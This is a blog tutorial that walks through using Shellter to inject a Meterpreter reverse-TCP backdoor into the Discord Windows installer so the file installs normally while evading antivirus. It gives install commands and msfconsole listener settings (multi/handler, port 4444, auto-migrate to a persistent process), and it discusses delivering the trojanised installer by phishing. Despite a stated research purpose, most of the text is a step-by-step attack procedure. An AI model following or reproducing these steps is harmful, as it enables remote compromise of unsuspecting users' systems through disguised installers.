Shellter - Hiding malicious code inside everyday installers

This tool will infect the PE with your malicious code by changing the execution flow of the target application with a unique dynamic approach.

by Johann Van Niekerk

Shellter - Hiding malicious code inside everyday installers


Website including download instructions

Shellter is a great tool that allows dynamic shellcode/payload injection into a Portable Executable (PE). You can think of a PE as a program that is standalone and runs by itself; such as a program installer that you have download like DiscordSetup.exe.

This tool will infect the PE with your malicious code by changing the execution flow of the target application with a unique dynamic approach. It does not however alter the original structure of the PE or make memory modifications that will be picked up by antivirus scanning. Β This is important as it allows the infection of benign executables that are otherwise harmless and ensure it contains malicious entries that can fool antivirus protections and go undetected. For all intents and purposes the executable is just a normal installer and doesn't set off any red flags but what it does is definitely nefarious.

You may be questioning about the relevance here or the impact of this method of obfuscation and I am here to show you the reach that this path of obfuscation has.

As mentioned, the intent is to use unique and complicated methods to infect something that appears harmless. This harmless file can be as simple as the DiscordSetup.exe or the winrar.exe file. As you can imagine, this means that if there was some method to deliver this malicious file to a otherwise unsuspecting person then it is possible to compromise the persons' system without much difficulty.

Since the infection is unique and not something that is easily picked up by signature-based and often heuristic-based antivirus measures; then this is a ticking time bomb until the person launches the application.

Please be aware that this is purely for research purposes in order to prevent it in the future.

With that being said, I will demonstrate the potential reach that this tool can have (and there are more similar and advances methods and tools out there).

Setup & Installation

This is under the assumption that the reader is likely familiar with Linux and Offensive Security topics.

First up is the installation of the tool. It is available directly through the package manager within a few Linux distributions however it is also obtainable at the following Website including download instructions. For Kali we run with the following command to install the tool as well as the dependencies

# Installation on Kali Linux
sudo apt install shellter

# Dependency
sudo apt install wine

In order to demonstrate and use the tool, you will need to get some type of installer to test against. For this example I have chosen to use the Discord application installer and I will demonstrate the infection and then the exploitation.

For this example I have downloaded the latest Discord Installer and chosen the Windows binary at Discord Website:

Using Shellter

Shellter can be run directly from the terminal and will guide you with a few options.

# Run Shellter with the following terminal command

The tool will allow the choice between Auto or Manual operation modes. In manual mode, the tool and the Portable Executable (installer) will allow a much more granular method of control over how the infection is done and with it's high customisation options; this is the process we will follow if the Auto method failed.

We will proceed with the Auto method for the time being:

The tool will then ask for the PE Target or the path to the executable. In this instance I will point the tool towards the executable we have downloaded (DiscordSetup.exe)

The application will automatically create a backup of the installer application and place it inside a backup folder.

Then the application will test for the path behaviour and the instructions that the application sends. For Linux using Wine it may seem like the application is hanging but it will test for 60 seconds before proceeding.

After some time it will ask a few questions about the behaviour of the application when it is exploited. In particular Stealth Mode means asking if you want the binary to continue acting as it normally would after exploitation. In this case, should the application continue to install DiscordSetup.exe as intended.

Next, it will ask for what type of payload you wish to use and if you wish to use either a listed payload or allowing you the flexibility of a custom payload.

For the demonstration we will stick with meterpreter for the time being.

Including setting the IP address and specifying the Port for the backdoor application.

Finally after entering the address and port, the application proceeds to infect the installer and at the end we can see that the injection was successful.

With the injection successful, now it is a matter of getting the executable to the intended target. While this demonstration involves already having access to the machine, whether direct access or through an exploited remote shell, the principle still stands and ideally demonstrates if phishing is successful and what would happen. Β This could be in a form of sending an email with any Portable Executable and doesn't restrict itself to just installers.

The difference between this obfuscated payload versus any traditionally generated backdoor executable is that this method will mimic and behave exactly how the application should. There is no differences in the operation and thereby avoids any suspicion of the user. For all they know is that Discord installed correctly.

In order to demonstrate, I used a HTTP server to transfer file over.

Next we setup our listener on our Kali Linux machine to capture the connection that will come when the program is executed.

# Setup Meterpreter Listener
msfconsole -q
use exploit/multi/handler
set lhost
set lport 4444
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/migrate

msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Notice that we used the following command that is normally unusual with Meterpreter. To provide clarity, this command will automatically spawn a new process immediately after the connection is established and then migrate to that process as quick as possible. The idea behind this is because the DiscordSetup.exe installer as a process will only be open or active until it has finished the job. If the installation is quick then your backdoor is very quickly taken away from you.

Thereby using this additional argument means we are trying to escape from the installation process and move to a process that is more persistent. Normally penetration testers are manually migrating to chosen processes as to gain persistence and also to avoid certain knock-on effects with processes closing down or stopping. So this auto method is crude but if a person checks, then they will see an instance of notepad is active in the background.

set AutoRunScript post/windows/manage/migrate

We run the listener and finally we begin the Discord installation.

Immediately we have obtained a callout connection from the victim and have established our backdoor.

From here, we can do anything we want and compromise the system completely.

Final Word

While the method and operation of the Shellter tool seems simple enough; it is worth remembering that Defender, Web Application Firewalls and Antivirus vendors are aware of these tools and their Heuristic, machine learned and adapted applications can very easily pick up on most of these obfuscations and software that has been altered in a malicious way.

As of writing this piece, both a completely updated Defender and Edge/Firefox picked up on the executable immediately indicating that the Auto method is likely not the way to go. In this instance it may require the Manual method with some customisation that has not been picked up yet. This may not be true for older machines where updates is sparse and often forgotten.